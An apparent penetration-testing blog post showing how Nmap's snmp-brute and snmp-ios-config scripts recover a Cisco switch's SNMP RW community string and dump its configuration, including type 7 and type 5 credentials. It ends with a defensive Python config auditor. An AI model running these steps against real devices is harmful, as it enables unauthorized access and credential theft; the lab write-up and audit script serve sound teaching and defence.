Once you have the configuration you may find the password in plain text. If not, you can use my blog post on "Decrypting Cisco type 5 passwords" to recover it.
A lot of network devices have an SNMP Read/Write (RW) community string configured. If they do, Nmap has a script (snmp-ios-config) to pull down the configuration. But what if you don't know the RW community string? Luckily "private" is the default on a lot of devices, and Nmap has a script (snmp-brute) for that!
To get started, create a file with your guesses. I usually start with just "private" in the file; if that doesn't work, I paste in my list of guesses. There are a lot of password lists on the Internet, but I haven't found any SNMP community string lists, so I built one from all the switch/router configs I have in my possession. If the script finds a community string it prints it out with the words "Valid credentials". A note here: the script returns "Valid credentials" whether it finds a RW community string or a Read Only (RO) string, and the script used to pull down the configuration ONLY works with the RW string.
As always, DO NOT use this on a switch you don't own or have explicit written permission to work on. This script was run against a Cisco switch in my test lab. It wasn't connected to anything except my laptop.
Let's get started! Run this script and hopefully find a valid RW community string.
nmap -sU --script snmp-brute 192.168.10.100 --script-args snmp-brute.communitiesdb=c:\tftp-root\snmp-string.txt
Starting Nmap 6.47 ( http://nmap.org ) at 2015-03-03 15:50 Pacific Standard Time
Stats: 0:13:44 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 86.13% done; ETC: 16:06 (0:01:52 remaining)
Stats: 0:13:45 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 86.22% done; ETC: 16:06 (0:01:52 remaining)
Nmap scan report for 192.168.10.100
Host is up (0.0057s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
67/udp open|filtered dhcps
123/udp open ntp
161/udp open snmp
| snmp-brute:
| private - Valid credentials
|_ public - Valid credentials
162/udp open|filtered snmptrap
In this case "private" was being used as the RW community string. Now that we have the RW community string we can run the script that pulls down the configuration. On this switch there is a type 7 password! In that case just hit the iOS App Store or Google Play store and grab a "Cisco Type 7" app. Because type 7 is a reversible encoding rather than a hash, the app will recover the password in a split second without a word list.
nmap -sU -p 161 --script snmp-ios-config --script-args snmpcommunity=private 192.168.10.100
Starting Nmap 6.47 ( http://nmap.org ) at 2015-03-03 15:23 Pacific Standard Time
Nmap scan report for 192.168.10.100
Host is up (0.0031s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-ios-config:
| !
| ! Last configuration change at 15:21:28 PST Tue Mar 3 2015 by mhubbard
| ! NVRAM config last updated at 15:21:31 PST Tue Mar 3 2015 by mhubbard
| !
| version 15.0
| no service pad
| service tcp-keepalives-in
| service tcp-keepalives-out
| service timestamps debug datetime msec localtime show-timezone
| service timestamps log datetime msec localtime show-timezone
| service password-encryption
| service sequence-numbers
| !
| hostname ACME_Test
| !
| boot-start-marker
| boot-end-marker
| !
| !
| username Test privilege 15 password 7 0037312531682F2506324F41
| username cisco privilege 15 secret 5 $1$CxMS$kdjNOfZxN6qcqqCWBDEvQ1
Snipped
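The same config dump is what an administrator should be auditing before an attacker pulls it. The script below is an added example, not part of this post or of Nmap: it walks an IOS config and flags the settings this post relied on (well-known or RW community strings, communities with no access-list, and type 7 / type 5 credentials). The sample config is constructed; its hostname and username lines are copied from the output above, and the snmp-server lines are assumed.

```python
import re

# Constructed sample config. The hostname and username lines come from the
# snmp-ios-config output in the post; the snmp-server lines are assumed and
# match a switch that answers "private" as RW and "public" as RO.
SAMPLE_CONFIG = """\
version 15.0
service password-encryption
hostname ACME_Test
username Test privilege 15 password 7 0037312531682F2506324F41
username cisco privilege 15 secret 5 $1$CxMS$kdjNOfZxN6qcqqCWBDEvQ1
snmp-server community public RO
snmp-server community private RW
snmp-server community S3cr3tStr1ng RO 10
"""

# Strings that ship as defaults on many devices and are in every guess list.
WELL_KNOWN_COMMUNITIES = {"public", "private"}

# snmp-server community <string> [view <name>] [RO|RW] [<acl>]  (RO is the default)
COMMUNITY_RE = re.compile(
    r"^snmp-server community (?P<name>\S+)(?:\s+view \S+)?"
    r"(?:\s+(?P<mode>RO|RW))?(?:\s+(?P<acl>\S+))?\s*$"
)
# username <user> ... password|secret [<type>] <value>
USERNAME_RE = re.compile(
    r"^username (?P<user>\S+).*?\b(?P<kind>password|secret)\s+"
    r"(?:(?P<type>\d+)\s+)?(?P<value>\S+)$"
)


def audit_ios_config(config: str) -> list:
    """Return (offending line, finding) pairs for weak SNMP and login credentials."""
    findings = []
    for raw in config.splitlines():
        line = raw.strip()
        m = COMMUNITY_RE.match(line)
        if m:
            name, mode, acl = m["name"], m["mode"] or "RO", m["acl"]
            if name.lower() in WELL_KNOWN_COMMUNITIES:
                findings.append((line, f"well-known community string '{name}'"))
            if mode == "RW":
                findings.append((line, "RW community exposes the running config over SNMP"))
            if acl is None:
                findings.append((line, "no access-list limits which hosts may use this community"))
            continue
        m = USERNAME_RE.match(line)
        if m and m["kind"] == "password" and m["type"] == "7":
            findings.append((line, "type 7 is a reversible encoding, not a hash; use 'secret'"))
        elif m and m["kind"] == "password" and m["type"] in (None, "0"):
            findings.append((line, "plaintext password stored in the config"))
        elif m and m["kind"] == "secret" and m["type"] == "5":
            findings.append((line, "type 5 (MD5) is crackable offline; prefer type 8/9 where supported"))
    return findings
```

Run it against `show running-config` output saved from each device; a clean result is an empty list.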